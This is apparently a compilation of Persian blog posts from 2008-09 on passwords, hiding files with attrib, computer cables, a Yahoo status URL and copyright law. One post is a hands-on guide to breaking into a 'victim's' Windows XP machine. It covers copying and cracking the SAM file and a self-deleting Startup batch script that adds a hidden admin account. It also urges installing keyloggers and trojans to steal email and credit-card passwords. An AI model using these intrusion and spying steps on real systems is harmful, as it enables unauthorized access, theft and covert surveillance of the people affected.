1- انتخاب رمز قوي: به راستي چه رمزي قوي و مناسب است؟ پيشنهاد من به شما انتخاب رمزي حداقل 8 حرفي با تركيبي از حرف، عدد و حداقل يكي از كاراكترهاي خاص (@-$=% و ...) است. كاراكتر خاص را فراموش نكنيد زيرا باعث مي‌شود نرم‌افزارهاي Brute Force از يافتن رمز شما عاجز شوند.
2- استفاده از دو روش براي شناسايي: در سيستم خود و براي ورود از دو روش شناسايي استفاده كنيد مثلا استفاده از كارت هوشمند و رمز معمولي به صورت سري كه باعث مي‌شود ورود به محوطه شخصي شما بسيار سخت شود. اين روش معمولا هزينه چنداني نيز براي شما ندارد.
3- استفاده از تجهيزات بيومتريك: تجهيزات بيومتريك، تجهيزاتي هستند كه از مشخصات منحصر به فرد فيزيك شما استفاده مي‌كنند مانند اثر انگشت، اثر شبكيه چشم صدا يا ... . اين موارد چون تقريبا در جهان منحصر به فرد است، غير قابل تقلب و سوء استفاده است. در حال حاضر بهترين روش شناسايي افراد در جهان همين روش است و تنها ضعف وارده به آن، قيمت بالاي آن است ولي به نظر مي‌رسد آينده از آن اين تكنولوژي است.

با توجه به موارد ذكر شده فوق، نتيجه مي گيريم كه امنيت پسوورد يا همان كلمه عبور حياتي ترين بخش براي فعاليت در دنیای پر رمز و راز آی تی و اینترنت است و با كمي دقت و جديت مي‌توانيم علاوه بر حفظ اطلاعات شخصي و كاري خود، از عواقب خطرناك لو رفتن آن نيز در هر زمان جلوگيري كنيم.
__________________

۱۱.۰۱.۱۳۸۷

مخفی کردن یک فولدر یا فایل به شکلی جدید و حیرت انگیز!

مخفی کردن یک فولدر یا فایل به شکلی جدید و حیرت انگیز! در این ترفند قصد داریم یک روش بسیار جالب و کاربردی را به شما معرفی کنیم که با استفاده از آن میتوانید یک فولدر یا یک فایل را در داخل ویندوز XP به سادگی کاملأ از صحنه روزگار محو کنید به شکلی که کاملأ مخفی و ناپیدا شود. سپس خودتان میتوانید با دانستن نام آن فایل و یا فولدر مجدد و به همان سادگی آن را بازیابی و ظاهر سازید. این ترفند را میتوانید ساده ترین نوع مخفی سازی فایل دانست به نحوی که با استفاده از گزینه های مشاهده فایلهای Hidden و امثالهم هم نمیتوان آن را مشاهده کرد.

برای این کار:

ابتدا از منوی Stat وارد Run شوید. سپس دستور cmd را تایپ نموده و Enter بزنید.
اکنون در داخل CMD کد زیر را وارد کنید و Enter بزنید:

attrib +h +sD:/Tarfandestan
دقت کنید این کد فولدر Tarfandestan را در درایو D مخفی میسازد.
به Space های خورده شده در میان کد نیز دقت کنید.
با این عمل فولدر Tarfandestan کاملأ از روی هارد شما مخفی میشود.

در صورتی که میخواهید یک فایل را نیز مخفی کنید کافی است آدرس را بدین شکل وارد کنید:

attrib +h +s D:/Windows/Tarfandestan.exe
این کد فایل Tarfandestan.exe را در داخل درایو D و پوشه Windows مخفی میسازد.

به همین سادگی شما میتوانید عملیات مخفی سازی را انجام دهید.

اما چگونه این فایلهای مخفی کرده را بازگردانیم؟
بدین منظور در داخل CMD دستور زیر را وارد کنید تا به ترتیب فایلهای مخفی شده مان آشکار گردند:
attrib -h -sD:/Tarfandestan
attrib -h -s D:/Windows/Tarfandestan.exe

تنها دقت کنید که محل و نام فایل مخفی شده تان فراموش تان نشود چرا که دیگر امکان بازیابی آن وجود ندارد.

۱۰.۲۶.۱۳۸۷

روش نفوذ به ویندوز اکس پی

براي اين کار چند روش وجود دارد که روش اول هميشه کار ساز نيست و فقط بر روي کامپيوتر هايي جواب ميدهد که از نظر پيکربندي امنيتي بسيار ضعيف هستند .
روش اول :
در جايي که از شما UserName , Password پرسيده مي شود کليد هاي Alt+Ctrl+Del را دو مرتبه همزمان فشار دهيد . در قسمت UserName کلمه Administrator را وارد کرده و جاي کلمه عبور را خالي بگذاريد و Enter بزنيد تا وارد ويندوز شويد …
خوب اين روش ساده بود اما هميشه کارساز نيست اگر براي Administrator آن کلمه عبوري قرار داده شده باشد ؟!!
به سراغ روش دوم ميرويم :
روش دوم :
1- ابتدا يک فلاپي Bootable مي سازيم .
2- اغلب فايل سيستم ويندوز XP,2000 از نوع NTFS است و در محيط شبيه Dos که با فلاپي راه اندازي ميشود شناخته نمي شود بنا براين ما براي اين کار نياز به برنامه هايي مثل NTFS4DOS داريم.(اين نوع برنامه ها امکان کار کردن با درايو هايي که فايل سيستم آنها Ntfs را در dos به ما مي دهد.)
3- حالا که فلاپي آماده شد بايد با آن سيستم را راه اندازي کرد… اما اگر در Setup سيستم تنظيم شده باشد که با فلاپي راه اندازي نشود …؟!! آنگاه بايد به سراغ Setup رفت و در آن تنظيمات لازم را انجام دهيم اگر Setup با کلمه عبور محافظت شود آنگاه بايد به Bios نفوذ کنيم که در بخش نفوذ به Bios شرح داده شده است .
4- خوب پس از انجام مراحل فوق فلاپي را در فلاپي درايو قرار داده و سيستم را با آن راه اندازي مي کنيم . و بر نامه NTFS4DOS را اجرا مي کنيم تا به اطلاعات درايو هاي NTFS دسترسي داشته باشيم .
5- درايوي که ويندوز در آن نصب است را پيدا مي کنيم و به مسير زير رفته :
%Windir%\System32\Config\
Example : c:\windows\system32\config
در اين پوشه فايلي به نام * sam را در فلاپي کپي مي کنيم.
( نکته : در ويندوز 2000 با پاک کردن اين فايل ديگر کار تمام است و ميتوان با Username: Administrator و بدون پسورد وارد شويم اما ميتوان براي اين که رد پايي باقي نماند از فايل Sam يک کپي داشته باشيم تا بعد از انجام کارمان در ويندوز با برگرداندن اين فايل به جاي قبلي آن رد پاي خود را پاک کنيم و نام و پسورد کاربران به حالت قبل برگردد.)
از اين مرحله به بعد براي Windows Xp بيشتر توصيه ميشود :
6- بعد از کپي فايل با برنامه هايي نظير L0phtCrack ,John the Ripper آن را کرک مي کنيم تا پسورد را به دست آورد .
روش سوم :
در اين روش چهار مرحله اول روش دوم را انجام ميدهيم.
1- دستورات زير را در Notepad مي نويسيم و در فايلي با نام و پسوند test.bat ذخيره ميکنيم :
@echo off
net user administrator 123 /add
net localgroup administrator administrators /add
net user administrator 123
del test.bat
@echo on
2- بعد فايل مورد نظر را در فلاپي کپي کرده و به سراغ کامپيوتر قرباني مي رويم و فايلي که در مرحله قبل ساخته ايم را در مسير زير کپي مي کنيم(به فرض که ويندوز در درايو C نصب باشد و کاربري با نام MOJTABA مدير سيستم باشد):
C:\Documents and Settings\MOJTABA\Start Menu\Programs\Startup
3- خوب حالا فقط کافي است که منتظر بمانيد تا کاربر MOJTABA يک بار وارد شود ديگر تمام است و شما بعد از آن مي توانيد با نام کاربري Administrator و کلمه عبور 123 وارد سيستم شويد.
توضيح دستورات مربوط به فايلي که ميسازيم :
در خط اول اين دستور باعث مخفي شدن بقيه دستورات در حال اجرا از ديد کاربر مي شود.
در خط دوم ما يک کاربر بانام Administrator و کلمه عبور 123 مي سازيم .(اين عمل براي اين صورت مي گيرد که ممکن است نام Administrator را تغییر داده باشند).
در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم.
در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم.
در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم.
در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم.
نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود .
روش چهارم
استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید از اینجا دریافت کنید.
نتیجه :
حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم .
اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و …
دوم این که توصیه می شود یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و … و وب سایت های که سر می زند و حتی کلماتی که چت می کند و … را بدانید ( در آینده نه چندان دور مقاله ای در مورد برنامه های جاسوسی خواهم نوشت ).
سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین …
چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید .
پنجم …
توصیه های مهم :
1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید .
2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید.
3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند.
4- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید.
5- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید .
6- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید .
7- هر چند وقت یکبار پسورد خود را عوض کنید. 8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید

راجع به كابل هاي اتصال در تكنولوژي كامپيوتر

راجع به كابل هاي اتصال در تكنولوژي كامپيوتر

بين پورت ها و كابل هاي مختلف از نظر نحوه اتصالات و سرعت انتقال تفوت هايي وجود دارد كه در اين مقاله 8 نوع از آنها را خدمت شما معرفي ميكنم *PARALLEL (موازي ): انتقال توسط اين پورتها بايت به بايت است . جديدترين تكنولوژي اين پورتها بنام هاي ECP و EPP روانه بازار شده است . مسلما سرعت هر دو اين پورت ها در انتقال اطلاعات بيشتر است اما فقط زماني كه دستگاه هاي آنها نيز مطابق با استاندارد ECP و EPP باشد . بيشتر پرينتر هايي كه با پورت USB كار ميكنند سرعتي معادل EPP و ECP ارند و از طرفي پورتهاي PARALLEL قابليت اطمينانشان بالاترمي باشد . پس اين از مزاياي پورتهاي مواي اما يك ايراد كوچك و آن هم اينكه اين پورت ها كابل هاي بزرگي دارند كه مقداري دست و پا گير هستند . با اين حال از اين پورت ها مي توان در اتصالات پرينتر و كامپيوتر به كامپيوتر (PC TO PC & PC TO (PRINTER استفاده كرد .
بالا ترين سرعت انتقال هم براي پارالل هاي استاندارد معادل 0.115MB/s يا 0.92Mbps و براي پورت هاي پارالل با استاندارد EPPو ECP معادل 3MB/s يا 24Mbps است ميبينيد چقدر تفاوت دارند؟ *SERIAL(سريال): سرعت اين پورتها خيلي پايين است چون انتقال را بيت به بيت انجام ميدهند . پس قاعدتا سرعت پايين اين پورت ها از ايراد هايي است كه ميتوان به آن وارد كرد. اما چون ميزان قابليت اطمينان بالايي دارند و لوازم جانبي كه با اين پورت ها كار ميكنند نسبتا ارزانتر از نوع USB دارشان هستند هنوز اين پورتها در بازار كار استفاده ميشوند .استفاده از اين پورت ها بيشتردر مودم ها و دوربين هاي ديجيتالي قديمي است . بالا ترين سرعت انتقالشان هم معادل -115Mbps يا 0.0.14MB/s است. *IDE (كابل نواريribboncable) : اگر داخل كيس كامپيوترتان را نگاهي انداخته باشيد تعدادي كابل هاي كاغذي شكل را خواهيد ديد كه از مادر بورد به قطعاتي مثل هارد ، cd_rom و floppy drive متصل شده است . اين كابل ها سه سر هستند وجهت انصال ابزار بيشتر سر سوم در كمر اين كابل ها قرار دارد . كابل هاي EIDE سري جديدي از اين نوع هستند كه به كاربر اجازه ميدهند تا درايو هاي مختلف مثل CD_ROM و درايو هايي با بيش از 523مگا بايت با پشتيباني از DMA را ساپورت كند . مورد استفاده اين كابل ها در اتصال هارد و فلاپي درايو و DVD _ROM ها و CD_ ROM ها ميباشد . بالا ترين سرعت انتقال اين كابل ها هم 33MB/s يا 264Mbps است. *FIRE WIRE : اين كابل ها از نظر ظاهري شبيه كابل هاي USB هستند اما كمي بلند تر و از نظر سرعت بسيار سريعتر ميباشند . اين كابل ها در سخت افزار هايي كه نياز به پهناي باند بالا دارند بسيار مناب است . مثل سخت فزار هاي تصاوير ديجيتال ، هارد درايو ، اسكنر و دوربين ديجيتال اين تكنولوژي هنوز بعنوان يك استاندارد در كامپيوتر هاي امروزي شناخته نشده است ولي در اغلب كامپيوتر هاي Compaq و كارت هاي fire wire اين پورت ها مشاهده ميشود . بهمراه اين پورت ها آداپتور هاي PCI وجود دارند . بالا ترين سرعت اين كابل ها معادل 50MB/s يا 400Mbps است. *INTELLIGENT (كابل هوشمند): كابلي كه ميزان انتقال اطلاعاتش را با توجه به انتظار ميزبان تنظيم ميكند . در اين كابل مداري تعبيه شده كه مي تواند خصوصيات اتصال برقرار شده را تعيين كند. *TWISTESPAIRCABLE (كابل جفت زوج بهم تابيده): در اين كابل دو رشته سيم پوشش دار بهم تابيده شده اند . يكي از اين دو سيم ، سيگنال هاي حساس را حمل كرده و ديگري به زمين متصل ميشود . اين كاب ها تداخل سيگنالي منابع راديويي قوي را كاهش ميدهد . به اين ترتيب كه سيم متصل به زمين تداخلات سيگنالي را جذب و از سيگنال حمل شده توسط سيم ديگر محافظت ميكند. *COAXIAL CABLE(كابل كواكسيال ): اين كابل از دو سيم كه يكي در مركز و ديگري بصورت پوششي بر آن است تشكيل شده است . سيم محاطي به شكل رشته سيم هاي بافته شده است كه با عايقي از سيم مركزي جدا ميشود . اين پوشش اختلالات الكتريكي و فركانس رابه حداقل ميرساند بهمين دليل در كابل هم محور سيگنال ها بر هم تاثير نميگذارند .و اختلالات پتانسيلي اين اجزا نيز روي سيگنال در حال عبور از اين كابل تاثير ندارد . *USB (مخفف Universal Serial Bus ): داراي دو مدل 1.1 و 2.0 است. اين كابل سرعت نسبتا بالايي دارد دارد و براحتي استفاده ميشود منظور از راحتي اين است كه قطع و وصل اين ابزار از كامپيوتر نيازي به خاموش كردن كامپيوتر ندارد برخي از دستگاه ها با اسفاده از USB ميوانند انرژي مورد نيازشان را هم تامين كنند. مثلا همين دوربين ها و ماوس ها مي توانند با اين پورت از برق سيستم براي تغذيه استفاده كنند . مورد استفاده اين پورت ها در دوربين هاي ديجيتال جديد ، اسكنر ها ، ماوس ها و پرينتر ها است . معمولا كامپيوتر هاي جديد داراي دو پورت USB هستند . اگر تعداد پور بيشتري نياز داشتيد ميتوانيد از USB Hub استفاده كنيد اين هاب وسايل رو بطور زنجيري به هم وصل ميكند .كابل هاي مخصوص اين پورت ها50 متر طول دارند . كه با استفاده از هاب تا 30 متر ديگر هم افزايش مي يابد. با اين پورت ميتوان تا 127 وسيله را بطور سري بهم متصل كرد . حداگثر سرعت انتقال داده ها در پورت USB 1.1 معادل 12Mbps يا 1.5MB/s است و در پورت 2.0 480Mbps يا 60MB/s ميباشد با تشكر، يلدا

۱۰.۲۲.۱۳۸۷

يک مورد جالب در ياهو !!! (تشخیص انلاین یا افلاین بودن افراد ) بدون رجوع به هیچ سایتی

امروز چيزه جالبی پيداا کردم ، شايد هم ديگر دوستان قبل از من اين رو کشف کرده بودند ...

اين آدرس ها رو تو آدرس بار مرورگر خود تايپ کنيد و در قسمت [username] يوزر خودتون رو بنويسد . یا مثلا دوستان
برای اینکه بفهمید مخفی هستند یا نه

بدون ][
http://mail.opi.yahoo.com/online?u=[username]&m=g&t=೦
حالا نکته جالب اينجاست که در آخر آدرس با اعداد بازی کنيد و نتيجه رو ببينيد .

با اعداد 1،2،3،4،5،6،7،8،9،... امتحان کنيد و هر بار به يک شکل جديد بر ميخوريد ، مانند اشکال زير .

یعنی 0 اخر را پاک کنید و یک عدد بگذارید

مثلا ایدی خودم کاسپاروف
http://mail.opi.yahoo.com/online?u=sara_sheida2006&m=g&t=೫


کپی رایت در اینترنت

مطلب زیر که اطلاعات کلی درباره قانون کپی رایت (حق تکثیر) به شما میدهد، برگرفته از پیمان برن (Berne Convention) برای حمایت از دارایی ادبی و هنری است و در آن به قانون خاص هیچ کشوری اشاره نشده است. پیمان برن که در سال 1886 در شهر برن، بین کشورهای پادشاهی، منعقد شد. قبل از آن حقوق قانونی یک اثر متعلق به نویسنده آن بود اما نویسنده در خارج از مملکت مورد نظر، فاقد حقوق قانونی بود و مثلا در فرانسه، کتاب یک نویسنده انگلیسی بدون اجازه او چاپ میشد و نویسنده حق اعتراض نداشت. پیمان برن داشتن حق قانونی بر مالکیت یک اثر را در تمام کشورها قابل اجرا دانست.


پیمان برن تا کنون بارها مورد تجدید نظر قرار گرفته و از سال 1967 مدیریت آن بر عهده سازمان جهانی حمایت از حقوق مایملک معنوی Word Intellectual Property Organization یا WIPO قرار گرفته است.

کپی رایت چیست؟
کپی رایت نوعی حفاظت قانونی از آثار چاپ شده و چاپ نشده ادبی، علمی و هنری است.این آثار به هر صورت که عرضه شده باشند، در حالی که دارای ماهیتی قابل درک باشند- یعنی دیده،شنیده یا لمس شوند، شامل این حمایت خواهند بود. اگر این اثر یک مقاله، نمایشنامه، ترانه، یک حرکت جدید در رقص، کد HTML یا گرافیک کامپیوتری باشد که قابل ثبت بر کاغذ، نوار کاست، CD یا هارد درایو کامپیوتر باشد هم، شامل قانون کپی رایت میشود. قانون کپی رایت به خالق اثر اجازه میدهد تا از حقوق انحصاری تکثیر، اقتباس در شیوه بیان نو (مانند به فیلم تبدیل کردن یک رمان)، پخش و نمایش عمومی اثر استفاده کند. انحصاری به این معنا است که تنها خالق اثر، نه کسی که به نحوی به اثر دسترسی دارد، میتواند از این حقوق استفاده کند.

قانون کپی رایت از چه زمانی آغاز میشود و چه شرایطی دارد؟
قانون کپی رایت از زمانی که اثری در شکلی ملموس به وجود بیاید، شامل آن اثر میشود. برای مثال، یک ترانه سرای ساکن آمریکا، اشعار خود را نوشته، نام خود را امضا کرده و با گذاشتن نشانه Copyright ©در کنار آن تاکید میکند که نویسنده اشعار است. سپس نوشته هایش را در پاکتی گذاشته و به آدرس خودش پست میکند و این پاکت را دربسته نگه میدارد. درواقع شاهد او تاریخ مهر پست بر پاکت است. حالا او با در دست داشتن این نامه، اثر خود را در دفتر کپی رایت آمریکا به ثبت می رساند تا از هرگونه سوئ استفاده حمایت شود. حتا اگر شخصی قبل از ثبت رسمی اثر از آن استفاده کند، او با در دست داشتن پاکت میتواند مالکیت خود را به اثبات برساند.

این مثال درباره آثار دیجیتالی هم صدق میکند به این صورت هنگام حفظ یک اثر در کامپیوتر، تاریخ و ساعت آن هم حفظ میشود و شما با در دست داشتن فایل اصلی همواره میتوانید ثابت کنید که زودتر از شخصی که به نحوی (برای مثال از وب سایت) به اثر شما دست یافته، آنرا به وجود آورده بودید. اگر این شیوه از نظر شما کاستی هایی دارد میتوانید اثر خود را بر روی دیسکت یا CD کپی کرده و به آدرس خود پست کنید. آنرا در جای مطمئنی نگه دارید و در موقع لزوم در حضور شاهد، آنرا باز کنید.

چه زمانی کپی رایت یک اثر به پایان میرسد؟
گاهی اوقات در یک ثبت کپی رایت به چند تاریخ برمی خوریم برای مثال: "© Copyright 1998, 1999 John Smith." از آنجایی که یک خالق اثر در طول زمان کار خود را تصحیح، تکمیل یا دوباره نویسی میکند، تمام تاریخهای ثبت شده زمان خلق اثر را در دوره های مختلف مشخص میکنند و نشان دهنده زمان پایان گرفتن کپی رایت نیستند.

تاریخ انقضای کپی رایت، بر اساس پیمان برن، حداقل شامل طول حیات خالق آن و 50 سال پس از مرگ او است. این مقدار زمان شامل تمام کشورهای عضو در پیمان برن میشود و هر کشور میتواند زمان بیشتری برای قابل اجرا بودن کپی رایت قائل شود اما این زمان نمیتواند از مقدار تعیین شده در پیمان کمتر باشد. گاهی اوقات در طی یک وصیت رسمی حقوق یک اثر به بازماندگان صاحب آن تعلق میگیرد که البته باید به تایید رسمی رسیده باشد.
هنگامی که از یک وب سایت دیدن میکنید، کپی کردن مطالب، تصاویر یا کد HTML آن با چند کلیک انجام پذیر است و بسیاری از ما به دلایل مختلف این کار را انجام میدهیم. اشتباه عمومی در مواد موجود در اینترنت، این است که اینترنت یک فضای عمومی بوده و برداشت مطالب آن آزاد است، به خصوص که SAVE یا COPY فایلهای آن به سادگی امکان پذیر است و تقریبآ نمی توان از آن جلوگیری کرد. این طرز فکر مانند آن است که به خود اجازه دهیم به دلیل قرار داشتن فضای مقابل پارکینگ منازل در خیابان، در مقابل درب پارکینگ افراد پارک کنیم!


آنچه در اینترنت میبینیم در صورتی قابل کپی کردن است که یا دولتی باشد مانند سفارت خانه ها، دانشگاهها و مانند آن ...، یا تاریخ کپی رایت آن منقضی شده باشد و یا صاحب وب سایت حقوق خود را لغو یا واگذار کرده باشد. به خاطر داشته باشید که "اینترنت" و فضای عمومی یا "public domain" هم معنی نیستند.

مطالبی که توسط دیگران تهیه شده و با کسب اجازه قابل استفاده هستند
صاحبان فایلها و برنامه های Midi، تصاویر گرافیکی (عکسها، نشانه ها، آثار هنری دیجیتالی)، نوشته ها، متون، HTML، javascripts و تمام مواردی که استفاده از آن مجاز اعلام شده اند، به شما اجازه نمی دهند که مواد مورد نظر را به نام خود ثبت کنید و این اجازه به معنای احراز مالکیت نیست. علامت کپی رایتی که در پایین صفحه یک وب سایت میبینید برای بخشهایی است که دارنده سایت خودش به وجود آورده (مثلا طرح گرافیکی یک وب سایت موسیقی) نه بخشهایی که صاحب سایت اجازه استفاده آنها را دارد.

گرافیک ها و تصاویر لینکی رایگان
تصاویر گرافیکی که در سایتها با عنوان Free یا رایگان عرضه میشوند، جزو اموال عمومی نیستند، شما میتوانید از این تصاویر به طور رایگان استفاده نمایید اما "صاحب" آن به شمار نخواهید آمد. درواقع شما در صورتی میتوانید از آنها استفاده کنید که با شرایط صاحب آن موافقت کنید. برای مثال اگر صاحب اثر خواسته باشد که "در تصویر دخل و تصرف نکنید" یا "فقط در homepage شخصی خود از آن استفاده کنید" حتما این کار را انجام دهید. همین مساله در مورد تصاویر لینکی و نشانه ها هم صدق میکند.

فونتها و علائم تصویری یا Dingbats
عده ای تصور میکنند که طراحی فونت شامل قانون کپی رایت نمیشود و هنگامی که یک فونت طراحی شد، میتواند توسط عموم مورد استفاده قرار بگیرد. اما اینکه یک فونت به راحتی قابل تکثیر، کپی و انتشار است و اینکه "خط" وسیله ای برای بیان ایده ها و آثار تازه است، دلیل محکمی برای شامل نشدن قانون کپی رایت بر آن نیست. درست است که خط اصولا برای بیان تصویری افکار و ایده ها به وجود آمده است، اما یک طراح خط، برای کار خود همانقدر وقت، انرژی و خلاقیت مصرف میکند که یک نقاش یا نویسنده و با توجه به شرایط قانون کپی رایت، صاحب اثر معرفی میشود.

آیا HTML واقعا شامل کپی رایت میشود؟
طراحی یک صفحه اینترنتی یا layout آن هم نوشته یا طراحی صاحب آن است و یک HTML هنگامی که بر روی کاغذ نوشته میشود یا از آن یک پرینت تهیه میشود و به عبارتی به شکل ملموس درمی آید، شامل قانون کپی رایت خواهد شد. البته این قانون در موردی صادق است که شخصی، خودش کد مورد نظر را نوشته و اجرا کرده باشد. کپی کردن یک HTML از جای دیگر، شما را صاحب آن نخواهد کرد. البته هنگامی که شما صفحه ای را میبینید و آنرا بدون کپی کردن کدها، به طور قانونی شبیه سازی می کنید، مسئله فرق میکند. در این مورد کدها شامل کپی رایت نمیشوند بلکه نتیجه ملموس آن که به صورت یک layout، به ثبت رسیده است غیر قابل دخل و تصرف محسوب میشود.

تغییر کلی در نوشته، متن، تصاویر و... شخص دیگر و تبدیل آن به یک نسخه جدید
اگر با اجازه صاحب اثر، در متن، تصویر، کد HTML و موارد مشابه آن تغییر کلی ایجاد کنید و این تغییرات موافق با شرایط صاحب اثر باشد، شما صاحب اثر جدید هستید. در غیر این صورت به دزدی ادبی/هنری محکوم خواهید شد.

ترجمه یک متن از اینترنت شامل قانون کپی رایت میشود؟
مطابق با پیمان برن " نویسندگان متون ادبی و هنری که توسط این پیمان مورد حمایت قرار دارند، دارای حق اختصاصی ترجمه یا اعطای حق ترجمه اثر خود را به دیگری هستند." این جمله به این معنا است که برای ترجمه یک متن (ادبی، هنری، علمی)، شما به اجازه صاحب آن نیاز دارید و با وجود اینکه حقوق مربوط به ترجمه اثر را به دست خواهید آورد اما باید نام نویسنده را در ترجمه ذکر نمایید. استفاده منصفانه یا Fair Use مربوط به بخشی از قانون کپی رایت است که در آن اجازه استفاده از تمام یا بخشی از یک مطلب برای "تضمین شاعرانه"، "خبر رسانی"، تحقیق و تحصیل" ، بدون اجازه نویسنده مجاز اعلام شده است. اگر این استفاده در مواردی به غیر از اینها باشد غیر قانونی است. برای مثال استفاده از عکس مجله National Geographic در وب سایت شخصیتان، برای توصیف سفرتان به آفریقا، غیر قانونی است. اما اگر همان عکس را برای یک مقاله تحقیقی درباره عکاسی با ذکر منبع، در سایت خود بگذارید مشکلی پیش نخواهد آمد. توجه کنید که استفاده از منابع اطلاعاتی وب سایتها، بدون ذکر منبع، به هر دلیلی غیر قابل قبول خواهد بود.

کپی رایت بین المللی
هیچ قانون جهانی کپی رایتی وجود ندارد که از اثر شما در تمام جهان محافظت کند. البته کشورهای عضو پیمان برن و معاهده کپی رایت جهانی، این امکان را برای شما به وجود آورده اند تا از آثار خود در کشورهایی غیر از وطن خود، حمایت نمایید. بنابر این قرارداد، آثار زیر مورد حمایت قرار میگیرند:

1- آثار چاپ شده و چاپ نشده یک نویسنده که از اهالی یا ساکنین یکی از کشورهای تحت قرارداد باشد.
2- آثاری که با اجازه نویسنده اش که از اهالی یا ساکنان کشورهای تحت قرارداد نباشد، در یکی از کشورهای هم پیمان ، چاپ شده باشد.

در این صورت اثری که چاپ شده باشد، اگر به طور همزمان یا در فاصله 30 روز پس از اولین انتشارش در دو یا چند کشور تحت قرارداد به چاپ برسد، شامل حقوق کپی رایت پیمان برن و کپی رایت جهانی میشود و در تمام کشورهای این پیمان، تحت حمایت قرار میگیرد.
http://up.iranblog.com/images/0z5dgraxwa4j49a5ts77.gif http://up.iranblog.com/images/gv83ah5giec9g8jkopmc.gif